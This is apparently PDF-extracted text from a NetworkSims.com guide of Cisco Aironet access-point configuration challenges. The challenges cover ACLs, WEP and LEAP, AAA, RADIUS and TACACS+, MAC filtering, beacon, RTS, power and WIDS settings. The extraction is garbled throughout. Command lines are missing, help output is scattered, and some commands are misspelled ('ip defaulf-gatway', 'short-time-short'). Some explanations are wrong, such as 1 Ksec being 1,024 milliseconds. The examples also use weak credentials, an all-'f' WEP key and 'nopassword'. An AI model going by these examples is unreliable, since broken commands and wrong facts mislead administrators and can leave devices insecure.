This challenge involves the configuration of a standard access-list

Objectives
Define a standard access-list

Apply it on E0.
Example
The following sets up a standard access-list:
> en
# config t
any
Any source host
host
(config)# access-list 3 permit 48.13.112.0 ?
A.B.C.D Wildcard bits
log
Log matches against this entry
<cr>
(config)# int e0
(config-if)# ip access-group 3 ?
in
inbound packets
out outbound packets

Outline
Objectives
Create an extended ACL.
NetworkSims.com
375
Apply it onto the incoming port of E0.
Example
The following sets up an extended ACL:
> en
# config t
deny
permit
remark
(config)# access-list 106 permit tcp host 202.33.249.1 host 162.97.253.5 eq
syslog
(config)# access-list 106 deny tcp host 197.85.151.8 host 196.123.113.4 eq
syslog
255.255.255.0 eq syslog
(config)# access-list 106 deny tcp 24.81.208.0 255.255.255.0 127.46.93.0
255.255.255.0 eq syslog
(config)# int e0

Outline
This challenge involves the configuration of an encryption.
Objectives
Define the BVI address and subnet mask.

Define the encryption key.
Define LEAP.

The following sets up encryption and LEAP:
> en
# config t
(config)# dot11 ssid ohio
(config-ssid)# dot11 ssid ohio
(config-ssid)# authentication ?
client
LEAP client information
NetworkSims.com
376
key-management key management

network-eap
leap method
open
open method
shared
shared method
(config-ssid)# authentication network-eap ?
WORD leap list name (1 -- 31 characters)
(config-ssid)# auth net newhampshire ?
mac-address mac-address authentication method
<cr>
(config-ssid)# authentication network-eap newhampshire
(config-ssid)# exit
(config)# int bvi1
(config-if)# int d0
(config-if)# encry ?
key
Set one encryption key
mode encryption mode
vlan vlan
(config-if)# encry key ?
<1-4> key number 1-4
(config-if)# encry key 1
size Key size
(config-if)# encry key 1 size ?
128bit 128-bit key
40bit
40-bit key
(config-if)# encry key 1 size 128bit ?
0
Specifies an UNENCRYPTED key will follow
7
Specifies a HIDDEN key will follow
Hex-data 26 hexadecimal digits
(config-if)# encry key 1 size 128bit ffffffffffffffffffffffffff
(config-if)# encryp mode ?
ciphers Optional data ciphers
wep
Classic 802.11 privacy algorithm
(config-if)# encryp mode ciphers ?
ckip
Cisco Per packet key hashing
ckip-cmic Cisco Per packet key hashing and MIC (MMH)
cmic
Cisco MIC (MMH)
tkip
WPA Temporal Key encryption
wep128
128 bit key
wep40
40 bit key
(config-if)# encryp mode ciphers ckip
(config-if)# ssid ohio

The following sets up encryption and LEAP:
> en
# config t
(config)# int bvi1
(config-if)# int d0
(config-if)# encry ?
key
Set one encryption key
mode encryption mode
vlan vlan
(config-if)# encry key ?
<1-4> key number 1-4
(config-if)# encry key 1
NetworkSims.com
377
size Key size

(config-if)# encry key 1 size ?
128bit 128-bit key
40bit
40-bit key
(config-if)# encry key 1 size 128bit ?
0
7
Specifies a HIDDEN key will follow
Hex-data 26 hexadecimal digits
(config-if)# encry key 1 size 128bit ffffffffffffffffffffffffff
(config-if)# encryp mode ?
ciphers Optional data ciphers
wep
Classic 802.11 privacy algorithm
(config-if)# encryp mode ciphers ?
ckip
Cisco Per packet key hashing
ckip-cmic Cisco Per packet key hashing and MIC (MMH)
cmic
Cisco MIC (MMH)
tkip
WPA Temporal Key encryption
wep128
128 bit key
wep40
40 bit key
(config-if)# encryp mode ciphers ckip
(config-if)# ssid ohio
(config-if-ssid)# authentication ?
client
LEAP client information
key-management key management
network-eap
leap method
open
open method
shared
shared method
(config-if-ssid)# authentication network-eap ?
WORD leap list name (1 -- 31 characters)
(config-if-ssid)# authentication network-eap newhampshire

Outline
This challenge involves the configuration of mobile IP.
Objectives
Enable proxy-mobile on the device, and on the interface ports.
Example
The following sets up mobile IP:
> en
# config t
(config)# ip proxy-mobile ?
aap
Authoritative AP
enable Enable WLAN Proxy Mobile IP
pause
Disables Proxy Mobile IP without removing configuration
secure Security association
(config)# ip proxy-mobile enable
(config)# int bvi1
NetworkSims.com
378
(config-if)# ?
access-expression
arp
bandwidth
bridge-group
carrier-delay
cdp
custom-queue-list
dampening
default
delay
description
duplex
Configure duplex operation.
exit
fair-queue
full-duplex
half-duplex
help
hold-queue
ip
keepalive
Enable keepalive
l2-filter
protocols
load-interval
interface
logging
--More------ press any key --loopback
mac-address
mtu
no
ntp
Configure NTP
priority-group
random-detect
Interface
service-policy
shutdown
snmp
speed
Configure speed operation.
timeout
transmit-interface
interface
tx-ring-limit
(config-if)# ip proxy-mobile ?
<cr>
(config-if)# ip proxy-mobile
(config-if)# int d0
(config-if)# int e0

Outline
This challenge involves the configuration of a VLAN.
NetworkSims.com
379
Objectives
Define a VLAN.
Enable 802.1q on sub-interfaces.
Example
> en
# config t
(config)# dot11 ssid test
(config-ssid)# vlan 10
(config-ssid)# exit
(config)# int d0.1
(config-subif)# ?
arp
bandwidth
bridge-group
cdp
default
delay
description
encapsulation
Set encapsulation type for an interface
exit
ip
keepalive
Enable keepalive
logging
mtu
no
service-policy Configure QoS Service Policy
shutdown
timeout
(config-subif)# encapsulation?
dot1Q IEEE 802.1Q Virtual LAN
(config-subif)# encapsulation dot1q ?
<1-4094> IEEE 802.1Q VLAN ID
(config-subif)# encapsulation dot1q 1 ?
native
Make this as native vlan
second-dot1q Configure this subinterface as a 1Q-in-1Q subinterface
<cr>
(config-subif)# encapsulation dot1Q 10 native
(config-subif)# exit
(config)# int fa0.1
(config-subif)# encapsulation dot1Q 10 native
(config-if)# exit

Outline
NetworkSims.com
380
This is an intermediate test, which revises some of the main principles of Wireless
configuration. It will show knowledge of:
Hostname
BVI settings.
Gateway setting.
Domain name setting.
D0 settings.
SSID settings.
Username and password.
HTTP enable.

Outline
This challenge involves the configuration of location based services (LBS).
Objectives
Define an LBS profile.

Define the LBS server address and port.
Define LBS interface.
Example
> en
# config t
(config)# dot11 lbs test
(dot11-lbs)#?
lbs configuration commands:
channel-match only reports tag packet in the same tx & rx channel
exit
Exit from LBS sub mode
interface
enable LBS on radio interface
method
method used for AP to locate tag
multicast
multicast MAC address of LBS TAGs
no
packet-type
packet type used by the LBS tag and server
server
remote LBS server IP address and UDP port number
(dot11-lbs)# server a ?
A.B.C.D IP address
(dot11-lbs)# server a 1.2.3.4 ?
port server UDP port number
(dot11-lbs)# server a 1.2.3.4 p ?
<1024-65535> port number
NetworkSims.com
381
(dot11-lbs)# server a 10.0.0.1 port 1024 ?

<cr>
(dot11-lbs)# server address 10.0.0.1 port 1024
(dot11-lbs)# interface d0
(dot11-lbs)# method ?
rssi received signal strength identification
(dot11-lbs)# method r ?
<cr>
(dot11-lbs)# method rssi
Description
With LBS, access points monitor location packets sent by LBS positioning tags, and thus
allow assets to be tracked. On receiving a positioning packet, the access point determines
the received signal strength indication (RSSI). It then creates a UDP packet with the RSSI
value and the current time, which it then forwards to a location server. Next the location
server determines the position of the tag based on the information received.

Outline
This challenge involves the configuration of AAA for local authentication.
Objectives
Enable AAA.
Define local authentication.
Example
The following sets up AAA:
> en
# config t
(config)# aaa authorization exec local
(config)# aaa authorization network local
(config)# user ?
WORD User name
(config)# user test ?
access-class
autocommand
callback-line
callback-rotary
dnis
nocallback-verify
noescape
NetworkSims.com
382
nohangup
nopassword
password
privilege
secret
user-maxlinks
view
Set view name
<cr>
(config)# user test password ?
0
7
(config)# username test password bert

Outline
This challenge involves the configuration of AAA.
Objectives
Enable AAA.
Define local RADIUS.
Define RADIUS settings.
Example
The following sets up AAA:
> en
# config t
attribute
authorization
challenge-noecho
Access-Challenge
configure-nas
deadtime
directed-request
domain-stripping
host
key
local
password
retransmit
timeout
unique-ident
vsa
NetworkSims.com
383
(config)# radius-server local

(config-radsrv)#?
Local RADIUS server configuration commands:
authentication supported authentication
eapfast
EAP-FAST configurations
exit
Exit from local radius server sub mode
group
Configure client groups
nas
Configure allowed Network Access Servers
no
user
Configure client usernames and passwords
(config-radsrv)# user ?
WORD Client username
(config-radsrv)# user giraffe ?
nthash
Set NT hash of clientpassword
password Set client password
(config-radsrv)# user giraffe password root
(config-radsrv)# nas ?
A.B.C.D IP address of the NAS
(config-radsrv)# nas 42.55.230.3 ?
key Set NAS shared secret
(config-radsrv)# nas 42.55.230.3 key coconut
(config-radsrv)# exit
attribute
authorization
challenge-noecho
Access-Challenge
configure-nas
deadtime
directed-request
domain-stripping
host
key
local
password
retransmit
timeout
unique-ident
vsa
acct-port
alias
auth-port
key
retransmit
default)
timeout
default)
<cr>
(config)# radius-server host 42.55.230.3 auth 1812 acct 1813

Outline
NetworkSims.com
384
This challenge involves the configuration of and RADIUS account on an SSID.

Objectives
Enable AAA.
Define RADIUS.
Define an SSID.
Associate RADIUS account with an SSID.
Example
> en
# config t
(config)# radius h ?
(config)# rad h 1.2.3.4 ?
acct-port
alias
auth-port
backoff
delay)
key
retransmit
default)
timeout
default)
<cr>
(config)# radius-server host 42.55.230.3 auth 1812 acct 1813
(config)# dot11 ssid test
(config-ssid)# accounting test-acc

Outline
This challenge involves the configuration of a secure HTTP server (HTTPS), which is more
secure than normal Web access to the access point (HTTP). In an HTTPS connection the data
transmitted is encrypted.
Objectives
NetworkSims.com
385
Define a host name.

Define the gateway.
Define an HTTPS server.
Define the HTTPS port (default: 443).
Example
> en
# config t
(config)# hostname test
(config)# ip defaulf-gatway 192.168.0.1
(config)# ip domain-name perth.cc
(config)# ip http ?
access-class
authentication
client
help-path
HTTP help root URL
max-connections
path
port
secure-port
secure-server
secure-trustpoint
server
Enable http server
timeout-policy
(config)# ip http secure-server
(config)# ip http secure-port ?
<0-65535> Secure port number(above 1024 or default 443)
(config)# ip http secure-port 443

Outline
This challenge involves the configuration of TACACS+ for the Aironet.
Objectives
Define a host name.

Define AAA.
Define Tacacs+
Example
> en
NetworkSims.com
386
# config t
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
aaa new-model
tacacs-server host 39.100.234.1
tacacs-server key krinkle
aaa authentication login default group tacacs
aaa authentication ppp default group tacacs
aaa authorization network default group tacacs
aaa authorization exec default group tacacs

Outline
This challenge involves the configuration of security of the wireless access point.
Objectives

Example
> enable
# config t
(config)# username fred ?
access-class
autocommand
callback-line
callback-rotary
dnis
nocallback-verify
noescape
nohangup
nopassword
password
privilege
secret
user-maxlinks
view
Set view name
<cr>
(config)# username test nopassword
NetworkSims.com
387

(config)# user fred access-class ?
<1-199>
Access-class number
<1300-2699> Expanded Access-class number
Explanation
Level 1. This is the non-priviledged mode with a prompt of wap>.
Level 15. This is the highest level of privilege, and has a prompt of wap#.

access-enable
clear
connect
disable
disconnect
enable
exit
help
lock
login
logout
name-connection
ping
rcommand
resume
show
systat
telnet
terminal
traceroute
tunnel
where

Reset functions
Exit from the EXEC
Lock the terminal
Exit from the EXEC
Send echo messages
Thus:
NetworkSims.com
388

Outline
This challenge involves the configurationof the banner messages.
Objectives
Setup the Message-of-the-day (MOTD) message.

Setup the Login message.
Setup the EXEC message.
Example
> enable
# config t
amsterdam (config)# banner motd my device
amsterdam (config)# banner login how are you
amsterdam (config)# banner exec main device
amsterdam (config)# ip http server

Outline
This challenge involves the configuration of Simple Network Time Protocol (SNTP).
Objectives
Setup SNTP to receive time updates from a specific server.

Setup device to receive SNTP broadcasts.
NetworkSims.com
389
Set the system clock (this would not be required if an SNTP server is used,
obviously).
Example
> enable
# config t
amsterdam (config)# sntp ?
broadcast Configure SNTP broadcast services
logging
Enable SNTP message logging
server
Configure SNTP server
amsterdam (config)# snt s ?
Hostname or A.B.C.D Name or IP address of server
amsterdam (config)# sntp server 192.168.1.100 ?
version Configure NTP version
<cr>
amsterdam (config)# sntp server 192.168.1.100
amsterdam (config)# sntp broadcast ?
client Enable SNTP broadcast client mode
amsterdam (config)# sntp broadcast client
amsterdam (config)# exit
amsterdam # clock set 05:44
amsterdam # show sntp
SNTP server
Stratum
Version
Last Receive
192.168.1.100
16
1
never
Broadcast client mode is enabled.

Outline
This challenge involves the configuration of filtering incoming MAC addresses for D0.
Objectives
Setup MAC filters.

Implement MAC filters on the outgoing port of D0.
Example
> enable
# config t
(config) # access-list ?
<1-99>
IP standard access list
<100-199>
IP extended access list
<1100-1199>
Extended 48-bit MAC address access list
<1300-1999>
IP standard access list (expanded range)
NetworkSims.com
390
<200-299>
Protocol type-code access list
<2000-2699>
IP extended access list (expanded range)
<700-799>
48-bit MAC address access list
dynamic-extended Extend the dynamic ACL absolute timer
(config) # access-list 701 ?
deny
permit Specify packets to forward
(config) # access-list 701 deny ?
H.H.H 48-bit hardware address
(config) # access-list 701 deny 1111.2222.3333 ?
H.H.H 48-bit hardware address mask
<cr>
(config) # access-list 701 deny 1111.2222.3333 ffff.ffff.ffff
(config) # access-list 701 permit 0.0.0 ffff.ffff.ffff
(config) # int d0
(config-if) # l2-filter bridge-group-acl
(config-if) # bridge-group ?
<1-255> Assign an interface to a Bridge Group.
(config-if) # bridge-group 1
(config-if) # bridge-group 1 ?
<cr>
circuit-group
Associate serial interface with a circuit group
input-address-list
Filter packets by source address
input-lat-service-deny
Deny input LAT service advertisements matching a
group list
input-lat-service-permit
Permit input LAT service advertisements matching a
group list
input-lsap-list
Filter incoming IEEE 802.3 encapsulated packets
input-type-list
Filter incoming Ethernet packets by type code
lat-compression
Enable LAT compression over serial or ATM
interfaces
output-address-list
Filter packets by destination address
output-lat-service-deny
Deny output LAT service advertisements matching a
group list
output-lat-service-permit Permit output LAT service advertisements matching
a group list
output-lsap-list
Filter outgoing IEEE 802.3 encapsulated packets
output-type-list
Filter outgoing Ethernet packets by type code
port-protected
There will be no traffic between this interface
and other protected
subscriber-loop-control
Configure subscriber loop control
port interface in this bridge group
block-unknown-source
block traffic which come from unknown source MAC
address
input-pattern-list
Filter input with a pattern list
output-pattern-list
Filter output with a pattern list
path-cost
Set interface path cost
priority
Set interface priority
source-learning
learn source MAC address
spanning-disabled
Disable spanning tree on a bridge group
unicast-flooding
flood packets with unknown unicast destination MAC
addresses
(config-if) # bridge-group 1 input-address-list 701

Outline
NetworkSims.com
391
This challenge involves the configuration of filtering outgoing MAC addresses for D0.
Objectives
Setup MAC filters.

Example
> enable
# config t
(config) # int d0
(config-if)# l2-filter ?
block-arp
avoid arp attack
bridge-group-acl Use bridge-group ACLs
(config-if)# l2-filter bridge-group-acl ?
<cr>
(config-if)# bridge- ANY ?
<cr>
circuit-group
input-address-list
group list
group list
input-lsap-list
input-type-list
lat-compression
interfaces
output-address-list
group list
a group list
output-lsap-list
output-type-list
port-protected
and other protected
address
input-pattern-list
output-pattern-list
path-cost
priority
source-learning
spanning-disabled
unicast-flooding
addresses
NetworkSims.com
392
(config-if)# bridge- ANY output-a ?
<700-799> Ethernet address access list
(config-if) # bridge-group 1 output-address-list 701

Outline
This challenge involves the configuration of filtering outgoing MAC addresses for D0 for a
source and destination MAC address.
Objectives
Setup an extended MAC address filter.

Implement MAC filter on the outgoing port of D0.
Example
> enable
# config t
(config) # access-list 1102 deny 1111.2222.3333 0.0.0 1112.2222.3333 0.0.0
(config) # access-list 1102 permit 0.0.0 ffff.ffff.ffff 0.0.0 ffff.ffff.ffff
(config) # int d0
(config-if) # bridge-group 1 output-pattern-list ?
<1100-1199> Pattern access list number
(config-if) # bridge-group 1 output-pattern-list 1102

Outline
This challenge involves the configuration of filtering outgoing MAC addresses for D0 for a
source and destination MAC address.
Objectives
NetworkSims.com
393
Setup an extended MAC address filter.

Implement MAC filter on the incoming port of D0.
Example
> enable
# config t
(config) # access-list 1102 deny 1111.2222.3333 0.0.0 1112.2222.3333 0.0.0
(config) # access-list 1102 permit 0.0.0 ffff.ffff.ffff 0.0.0 ffff.ffff.ffff
(config) # int d0
(config-if) # bridge-group 1 input-pattern-list ?
<1100-1199> Pattern access list number
(config-if) # bridge-group 1 input-pattern-list 1102

Outline
This challenge involves the configuration of filtering incoming MAC addresses for D0.
Objectives
Setup MAC filters.

Example
> enable
# config t
(config) # int d0
(config-if) # bridge-group 1 intput-address-list 701

Outline
NetworkSims.com
394
This challenge involves the configuration of ARP caching for connected wireless nodes, and
to enable Cisco Aironet extensions.
Objectives
Setup BVI port.

Enable ARP caching for connected wireless nodes.
Enable Cisco Aironet extensions.
Example
> enable
# config t
(config)# int bvi 1
(config-if)# exit
(config)# dot11 arp-cache
(config)# int d0
(config-if)# dot11 ?
extension Cisco IEEE 802.11 extension
qos
Dot11 QOS configuration
(config-if)# dot11 ex ?
aironet Cisco Aironet extension
power
Enable Cisco proprietary native power management
(config-if)# dot11 extension aironet
Explanation
The Cisco Aironet extensions are:
Cisco Key Integrity Protocol (CKIP). This uses a permutation method to renuew the
WEP key. If TKIP is used, CKIP is not required.
Limiting power level. This allows the Aironet to control the power level of the clients,
once they associate.
Load balancing. This allows the access point to select the best access point in terms of
signal strength, load requirements, and so on.
Message Integrity Check (MIC). This enhances WEP security again a number of attacks.
Repeater mode. This allows the access to support repeater access points.
World mode. This allows for carrier information from the wireless device and adjust
their settings automatically.
NetworkSims.com
395

Outline
This challenge involves the disabling of ARP caching for connected wireless nodes, and to
disable Cisco Aironet extensions.
Objectives
Setup BVI port.

Disable ARP caching for connected wireless nodes.
Disable Cisco Aironet extensions.
Example
> enable
# config t
(config)# int bvi 1
(config-if)# exit
(config)# no dot11 arp-cache
(config)# int d0
(config-if)# no dot11 extension aironet
Explanation
The Cisco Aironet extensions are:
Cisco Key Integrity Protocol (CKIP). This uses a permutation method to renuew the
WEP key. If TKIP is used, CKIP is not required.
Limiting power level. This allows the Aironet to control the power level of the clients,
once they associate.
Load balancing. This allows the access point to select the best access point in terms of
signal strength, load requirements, and so on.
Message Integrity Check (MIC). This enhances WEP security again a number of attacks.
Repeater mode. This allows the access to support repeater access points.
World mode. This allows for carrier information from the wireless device and adjust
their settings automatically.
NetworkSims.com
396

Outline
This challenge involves the configuration of the beacon settings for the beacon period and
for the DTIM (delivery traffic indication message).
Objectives
Define the beacon period.

Define the beacon DTIM.
Example
> enable
# config t
(config)# int bvi1
(config-if)# int d0
period
beacon period
(config-if)# beacon dtim?
<1-100> dtim count
(config-if)# beacon dtim 50
Explanation
The beacon period is defined as the amount of time between access point beacons in
Kilomicroseconds (1 Ksec is 1,024 millseconds). The default is 100 Ksec. If the beacon
period is 1000, the time between beacons is approximately 1 second (1.024 seconds).
The Data Beacon Rate defines how often the DTIM (delivery traffic indication message)
appears in a beacon, where the DTIM tells power-save client devices that a packet is waiting
for them. The default DTIM is 2. If the DTIM is set at 5, and the beacon period is 1000, a
packet with a DTIM will be sent every 5 seconds (approx).
RTS Explained
Outline: This challenge involves an analysis of RTS.
NetworkSims.com
397
Objectives: The objectives of this challenge are to explain RTS.

Example
> enable
# config t
(config)# int bvi1
(config-if)# int d0
(config-if)# rts ?
retries
RTS max retries
(config-if)# rt re ?
<1-128> max retries
(config-if)# rt th ?
Explanation
The RTS threshold prevents the Hidden Node problem, where two wireless nodes are within
range of the same access point, but are not within range of each other, as illustrated in
Figure 1. As they do not know that they both exist on the network, they may try to
communicate with the access point at the same time. When they do, their data frames may
collide when arriving simultaneously at the access point, which causes a loss of data frames
from the nodes. The RTS threshold tries to overcome this by enabling the handshaking
signals of Ready To Send (RTS) and Clear To Send (CTS). When a node wishes to
communicate with the access point it sends a RTS signal to the access point. Once the access
point defines that it can then communicate, tit sends a CTS signal. The node can then send
its data, as illustrated in Figure 2. RTS threshold determines the data frame size that is
required, in order for it send an RTS to the WAP. The default value is 4000.
# config t
(config-if)# rts ?
retries
RTS max retries
... diagrams not shown in Demo version.
RTS retries defines the number of times that an access point will transmit an RTS signal
before it stops sending the data frame. Values range from 1 to 128. For example:
NetworkSims.com
398
# config t
(config-if)# rts retries ?
<1-128> max retries
(config-if)# end
Fragment-threshold Explained
Outline: This challenge involves an analysis of the fragment-threshold.
Objectives: The objectives of this challenge are to explain fragment-threshold.
Example
> enable
# config t
(config)# int bvi1
(config-if)# int d0
(config-if)# fragment-threshold ?
<256-2346>
(config-if)# fragment-threshold 1000
Explanation
A wireless data frame can have up to 2312 data bytes in the data payload. This large amount
could hog the bandwidth too much, and not give an even share to all the nodes on the
network, as illustrated in Figure 1. Research has argued that creating smaller data frames,
often known as cells, is more efficient in using the available bandwidth, and also for
switching data frames. Thus wireless systems provides a fragment threshold, in which the
larger data frames are split into smaller parts, as illustrated in Figure 2. An example of the
configuration is:
# config t
(config-if)# fragment-threshold ?
<256-2346>
(config-if)# fragment-threshold 700
Power Settings Explained

Outline: This challenge involves an analysis of the power settings.
Objectives: The objectives of this challenge are to explain power settings.
NetworkSims.com
399
Example
> enable
# config t
(config)# int bvi1
(config-if)# int d0
(config-if)# po lo cc ?
<1 - 50> One of: 1 5 10 20 30 50
maximum
Set local power to allowed maximum
<1 - 50> One of: 1 5 10 20 30 50
local
Set client power to Access Point local power
maximum
Set client power to allowed maximum
Explanation
The power of the access point and also of the clients are important as they will define the
coverage of the signal, and must also be within the required safety limits. Thus, the more
radio power that is used to transmit the signal, the wider the scope of the wireless network.
Unfortunately, the further that the signal goes, the more chance that an intruder can pick up
the signal, and, possibly, gain access to its contents, as illustrated in Figure 1. To control this
power, the access point can set up its own radio power, and also is able to set the power
transmission of the client adapter. An example in setting the local power, and the client is
shown next:
# config t
<1-50>
One of: 1 5 20 30 50
<1-50>
One of: 1 5 20 30 50

One the client, especially with portable devices, the power usage of the radio port is
important. Thus there are typically power settings, such as:
-
CAM (Constant awake mode). Used when power usage is not a problem.
PSP (Power save mode). Power is conserved as much as possible. The card will typically
go to sleep, and will only be awoken by the access point, or if there is activity.
FastPSP (Fast power save mode). This uses both CAM and PSP, and is a compromise
between the two.
NetworkSims.com
400
Max-associations Explained
Outline: This challenge involves an analysis of the power settings.
Objectives: The objectives of this challenge are to explain the maximum associations.
Example (12.3)
> enable
# config t
(config-ssid)# max ?
(config-ssid)# exit
(config)# int bvi1
(config-if)# int d0
Example
> enable
# config t
(config)# int bvi1
(config-if)# int d0
(config-if-ssid)# max-assoc ?
Explanation
A particular problem in wireless networks is that the access point may become
overburdened with connected clients. This could be due to an attack, such as DoS (Denial of
Service), or due to poor planning. To set the maximum number of associations, the maxassociations command is used within the SSID setting:
# config t
(config-if-ssid)# max ?
(config-if-ssid)# max 100
(config)# exit
and to show the associations for the wireless access point:

# show dot11 ?
# show dot11 association
NetworkSims.com
401
# show dot11 statistics client-traffic
and for associated access points:

# show dot11 adjacent-ap
Preamble Explained
Outline: This challenge involves an analysis of the preamble.
Objectives: The objectives of this challenge are to explain the preamble.
Explanation
This can either be set to Long (which is the default) or short. A long preamble allows for
interoperatively with 1Mbps and 2Mbps DSSS specifications. The shorter allows for faster
operations (as the preamble is kept to a minimum) and can be used where the transmission
parameters must be maximized, and that there are no interoperatablity problems. To set
short preamble:
# config t
(config-if)# preamble-short
(config-if)# end
Station-role Explained
Outline: This challenge involves an analysis of the station role.
Objectives: The objectives of this challenge are to explain the station role.
Explanation
A root access point is used to connect a wireless client to a fix network, whereas a repeater
access point does not connect to a wired LAN, and basically forwards the data packets to
another repeater or to a wireless access point which is connected to a wired network (Figure
1). With a repeater, of course, the Ethernet port will not operate. The repeater access point
typically associates with an access point which has the best connectivity, however they can
be setup to connect to a specific access point. In the following case, the access point will
associate with the parent with the specified MAC address (1111.2222.3333):
# config t
NetworkSims.com
402
(config)# dot11 ssid napier

(config-ssid)# infr ?
optional turn off infrastructure restrictions
<cr>
(config-ssid)# exit
(config)# interface d0
(config-if)# ssid napier
(config-if)# station-role repeater
(config-if)# dot11 extensions aironet
<1-4>
Parent number
(config-if)# parent 1 1111.2222.3333
(config-if)# parent 2 2222.aaaa.bbbb
(config-if)# end
Or
# config t
(config)# interface d0
(config-if)# ssid napier
(config-ssid)# exit
(config-if)# station-role repeater
(config-if)# dot11 extensions aironet
(config-if)# parent 1 1111.2222.3333
(config-if)# parent 2 2222.aaaa.bbbb
(config-if)# end
It is possible to define up to four parents, so that if one fails to association, it can use others.
In most cases the Cisco Aironet extensions must be enabled, as it aids the association
process, but this can cause incompatibility problems with non-Cisco devices.
The repeater will start with the first parent, and, if it cannot connect, it will then try the next
parent, and so on. Overall, repeaters are fairly good at extending the range of a wireless
network, but reduce the throughput, as bandwidth is wasted in relaying the data from
repeaters. As an approximation the actual throughput will be reduced by at least half.
Short-time Slot Explained

Outline: This challenge involves an analysis of the short-time slot.
Objectives: The objectives of this challenge are to explain the short-time slot.
Explanation
NetworkSims.com
403
The throughout of a wireless network can be reduced by enabling short slot time. When
enabled it reduces the slot time from 20 microseconds to 9 microseconds. The backoff time is
the time that wireless nodes and is a random multiple of the slot-time. Thus reducing the
slot time will typically reduce the backoff time. To enable it:
(config)# int d0
(config-if)# short-time-short
Note that short slot time is only available in IEEE 802.11g. By default it is disabled.
MAC Authentication Explained

Outline: This challenge involves an analysis of the MAC authentication cache.
Objectives: The objectives of this challenge are to explain MAC authentication cache.
Example
> enable
# config t
(config)# int bvi1
(config-if)# exit
(config)# dot11 aaa ?
csid
Calling and Called station ID format
dot1x
802.1x
(config)# dot11 aaa authentication ?
attributes Configure Dot11 AAA authentication attributes
mac-authen Configure Mac Authentication details
(config)# dot11 aaa authentication mac-authen filter-cache
Explanation
MAC authentication cache on the access points is typically used where MAC-authenticated
clients roam around the network. When it is enabled it reduces the time overhead in reauthenticating the nodes with an authentication server. When a node is initially
authenticated, its MAC address is added to the cache.
Wireless IDS Explained

Outline: This challenge involves an analysis of WIDS.
Objectives: The objectives of this challenge are to explain WIDS.
NetworkSims.com
404
Example
> enable
# config t
(config)# int bvi1
(config-if)# int d0
(config-if)# st ?
non-root
Non-root (bridge)
repeater
root
scanner
(config-if)# station scanner
(config-if)# monitor ?
frames Monitor dot11 frames
(config-if)# monitor frames ?
endpoint endpoint station where the captured traffic is
(config-if)# monitor frames endpoint ?
ip IP address
(config-if)# monitor frames endpoint ip ?
address IP address
(config-if)# monitor frames endpoint ip address ?
A.B.C.D Destination IP Address xxx.xxx.xxx.xxx
(config-if)# monitor frames endpoint ip address 10.0.0.1 ?
port UDP port number
(config-if)# monitor frames endpoint ip address 10.0.0.1 port ?
<1024-65535> Destination UDP port number 1024 to 65535
(config-if)# monitor frames endpoint ip address 10.0.0.1 port 1111
(config-if)# exit
(config)# wlccp ?
ap
Enable WLCCP AP
authentication-server Authentication Server
wds
Enable Wireless Domain Service Manager
wnm
Configure Wireless Network Manager
(config)# wlccp ap ?
username
wds
Specify the AP's WLCCP username

IP address of WDS
(config)# wlccp au ?
client
For Clients
infrastructure For Infrastructure Nodes
(config)# wlccp wd ?
aaa
Authentication, Authorization, and Accounting
interface
Interface to send WDS Adv
priority
Priority of WDS
recovery
WDS Graceful Recovery
statistics Roaming statistics
NetworkSims.com
405
(config)# wlccp wn ?
ip IP configuration commands
Explanation
The scanner mode is used in WIDS where the access point listens on all of the radio
channels and reports activity. As it is used as a WIDS, it does not accept any associations.
The monitor command can then be used to forward all of the data packets received to a
specific address on a certain port, such as for 10.0.0.1 on UDP port 1111 :
(config-if)# monitor frames endpoint ip address 10.0.0.1 port 1111
To show the captured packets:

# sh wl ap rm monitor stat
Dot11Radio0
====================
WLAN Monitoring
:
Endpoint IP address
:
Endpoint port
:
Frame Truncation Length
:
Dot11Radio1
====================
WLAN Monitoring
Enabled
10.0.0.1
1111
128 bytes
: Disabled
WLAN Monitor Statistics

==========================
Total No. of frames rx by DOT11 driver
Total No. of Dot11 no buffers
Total No. of Frames Q Failed
Current No. of frames in SCAN Q
:
:
:
:
0
0
0
0
Total
Total
Total
Total
Total
:
:
:
:
:
0
0
0
0
0
No.
No.
No.
No.
No.
of
of
of
of
of
frames captured
data frames captured
control frames captured
Mgmt frames captured
CRC errored frames captured
Total No. of UDP packets forwarded

Total No. of UDP packets forward failed
: 0
: 0
and to clear the statistics:

# clear wlccp ap rm statistics
Wireless Shutdown Explained

Outline: This challenge involves an analysis of wireless shutdown.
NetworkSims.com
406
Objectives: The objectives of this challenge are to explain wireless shutdown.

Example
> enable
# config t
(config)# int bvi1
(config-if)# int d0
(config-if)# station root fallback shutdown
Explanation
A major problem occurs when the Ethernet/Radio port fails, and in some situations the
radio port of the access-point should shutdown. The following shuts down the D0 port
when the Ethernet connection fails:
non-root
Non-root (bridge)
repeater
root
scanner
(config-if)# station root ?
access-point Access point
ap-only
Bridge root in access point only mode
bridge
Bridge root (without wireless client)
fallback
Root AP action if Ethernet port fails
(config-if)# station root fallback ?
repeater Become a repeater
shutdown Shutdown the radio
(config-if)# station root fallback shutdown
Web Server Explained

Outline: This challenge involves an analysis of the Web server.
Objectives: The objectives of this challenge are to explain the Web server.
Explanation
By default the Web server is not enabled. To enable it:
# config t
(config)# int bvi1
(config-if)# exit
By default the Web page is then accessed by the client with (http://10.0.0.1):
NetworkSims.com
407
... graphic missed out on version see help file.

Sometimes another port is used, such as 8080 with:
which is accessed with (http://10.0.0.1:8080):

The details are then displayed with:
# sh ip http server all
HTTP server status: Enabled
HTTP server port: 8080
HTTP server authentication method: enable
HTTP server access class: 0
HTTP server base path: flash:/c1200-k9w7-mx.123-8.JA/html/level/1;zflash:/c1200k9w7-mx.123-8.JA/html/level/1;flash:/c1200-k9w7-mx.1238.JA/html/level/15;zflash:/c1200-k9w7-mx.123-8.JA/html/level/15;flash:/c1200-k9w7mx.123-8.JA/html;zflash:/c1200-k9w7-mx.123-8.JA/html;flash:
Maximum number of concurrent server connections allowed: 5
Server idle time-out: 120 seconds
Server life time-out: 120 seconds
Maximum number of requests allowed on a connection: 60
HTTP secure server capability: Present
HTTP secure server status: Disabled
HTTP secure server port: 443
HTTP secure server ciphersuite: 3des-ede-cbc-sha des-cbc-sha rc4-128-md5 rc4-128-sha
HTTP secure server client authentication: Disabled
HTTP secure server trustpoint:
HTTP server application session modules:
Session module Name Handle Description
Homepage_Server
3
IOS Homepage Server
HTTP IFS Server
1
HTTP based IOS File Server
WEB_EXEC
2
HTTP based IOS EXEC Server
tti-petitioner
4
TTI Petitioner
HTTP server current connections:
local-ipaddress:port remote-ipaddress:port in-bytes
10.0.0.1:8080
10.0.0.2:4066 5197
out-bytes
50720
